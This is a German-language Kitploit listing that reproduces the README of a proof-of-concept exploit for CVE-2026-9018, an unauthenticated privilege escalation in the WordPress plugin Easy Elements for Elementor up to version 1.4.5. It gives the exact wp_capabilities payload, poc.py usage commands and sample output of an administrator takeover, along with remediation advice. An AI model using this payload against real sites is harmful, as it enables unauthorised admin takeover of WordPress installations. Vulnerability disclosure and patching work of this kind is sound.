Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/xxconi/cve-2026-9018
Privilege EscalationVulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration TestingLearning & Education
GitHubxxconi/cve-2026-9018

CVE-2026-9018

Unauthenticated Privilege Escalation CVE-2026-9018: Easy Elements for Elementor

Repository anzeigen
1vor 2 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-9018

CVE-2026-9018 — Easy Elements for Elementor ≤ 1.4.5 | Nicht authentifizierte Privilegienausweitung

CVE CVSS CWE Auth Python

Forschung von: Atomic Edge Schweregrad: Hoch | CVSS: 8.8 | Authentifizierung erforderlich: Keine


Übersicht

Eine nicht authentifizierte Privilegienausweitung-Schwachstelle existiert im WordPress-Plugin Easy Elements for Elementor – Addons & Website Templates (Versionen ≤ 1.4.5). Die Funktion easyel_handle_register(), die über den AJAX-Handler wp_ajax_nopriv_eel_register bereitgestellt wird, übergibt vom Angreifer kontrollierte custom_meta-POST-Werte direkt an update_user_meta(), ohne eine Schlüssel-Whitelist. Dies ermöglicht es einem nicht authentifizierten Angreifer, den wp_capabilities-Metaschlüssel zu überschreiben und ein Administratorkonto zu erstellen.


Voraussetzungen

Vor der Ausnutzung müssen auf der Zielseite die folgenden Bedingungen erfüllt sein:

  • ✅ WordPress Benutzerregistrierung ist aktiviert (Einstellungen → Allgemein → Jeder kann sich registrieren)
  • ✅ Eine Seite mit dem Login/Register-Widget des Plugins ist öffentlich zugänglich
  • ✅ Das Widget stellt den Wert easy_elements_nonce im Seiten-DOM bereit.

Anforderungen

root@kitploit:~
pip install requests

Verwendung

root@kitploit:~
# Standard – Nonce von der Startseite holen
python3 poc.py -u https://target.com

# Benutzerdefinierte Anmeldedaten
python3 poc.py -u https://target.com -U hacker -e [email protected] -p P@ssw0rd!

# Widget befindet sich auf /login/ Seite
python3 poc.py -u https://target.com --nonce-page /login/

# SSL-Verifikation überspringen
python3 poc.py -u https://target.com --no-verify

# Login-Prüfung nach Exploit überspringen
python3 poc.py -u https://target.com --skip-verify-login

Argumente

Beispielausgabe

root@kitploit:~
[*] Fetching nonce from: https://target.com/login/
[+] Nonce found: a1b2c3d4e5

[*] Sending privilege escalation payload to: https://target.com/wp-admin/admin-ajax.php
[*] Username : atomic_admin
[*] Email    : [email protected]
[*] Role     : administrator (via wp_capabilities override)

[+] HTTP Status : 200
[✓] Privilege escalation payload accepted!
[✓] Admin login CONFIRMED!

    ┌─────────────────────────────────────────┐
    │  WP Admin  : https://target.com/wp-admin/
    │  Username  : atomic_admin
    │  Password  : Atomic@Edge2026!
    └─────────────────────────────────────────┘

Technische Details

Der Exploit folgt einem zweistufigen Prozess:

Schritt 1 — Nonce-Auslesen Das Login/Register-Elementor-Widget des Plugins rendert ein verstecktes easy_elements_nonce-Feld im HTML der Seite. Dieses Nonce ist für jeden nicht authentifizierten Besucher öffentlich zugänglich und wird per Regex aus dem Seitenquelltext extrahiert.

Schritt 2 — Böswillige Registrierung Eine POST-Anfrage wird an /wp-admin/admin-ajax.php mit action=eel_register gesendet. Das custom_meta-Array wird so gestaltet, dass es Folgendes enthält:

root@kitploit:~
custom_meta[wp_capabilities][administrator] = 1

Da easyel_handle_register() alle custom_meta-Schlüssel ohne eine Whitelist direkt an update_user_meta() übergibt, wird die Benutzermeta wp_capabilities nach der Registrierung überschrieben, was dem neuen Benutzer volle Administratorrechte gewährt.


Behebung

Entwickler müssen die folgenden Korrekturen an easyel_handle_register() vornehmen:

  1. Implementieren Sie eine strenge Whitelist der erlaubten custom_meta-Schlüssel (z. B. first_name, last_name, phone)
  2. Blockieren Sie explizit sensible Schlüssel: wp_capabilities, wp_user_level, session_tokens
  3. Vermeiden Sie die Verarbeitung jeglicher vom Benutzer bereitgestellter Meta nach wp_insert_user(), falls nicht erforderlich
  4. Die Eingabebereinigung allein ist nicht ausreichend – eine Whitelist ist zwingend erforderlich

→ Aktualisieren Sie sofort auf Easy Elements for Elementor 1.4.6 oder höher.


Haftungsausschluss

Dieses Repository ist ausschließlich für autorisiertes Sicherheitsforschung und Bildungszwecke bestimmt. Verwenden Sie dieses Tool nicht gegen ein System ohne ausdrückliche schriftliche Genehmigung des Systembesitzers. Unbefugte Nutzung kann gegen den CFAA (USA), Strafgesetzbuch s.342.1 (Kanada), die EU-NIS2-Richtlinie und andere geltende Gesetze verstoßen. Die Autoren übernehmen keine Haftung für Missbrauch oder Schäden, die aus diesem Code entstehen.

Tool herunterladen
EigenschaftDetail
PluginEasy Elements for Elementor – Addons & Website Templates (easy-elements)
Betroffen≤ 1.4.5
Behoben in1.4.6+
AngriffsvektorNetzwerk / Nicht authentifiziert
CWECWE-269: Verbesserung der Privilegienverwaltung
AJAX-Aktioneel_register (nopriv)
FlagBeschreibungStandard
-u, --urlZiel-WordPress-URL(erforderlich)
-U, --usernameBenutzername für das neue Administratorkontoatomic_admin
-e, --emailE-Mail für das neue Administratorkonto[email protected]
-p, --passwordPasswort für das neue AdministratorkontoAtomic@Edge2026!
-np, --nonce-pageSeitenpfad, der das Login/Register-Widget enthält/
--no-verifySSL-Zertifikatsprüfung deaktivierenfalse
--skip-verify-loginÜberprüfung des WP-Admin-Logins nach Exploit überspringenfalse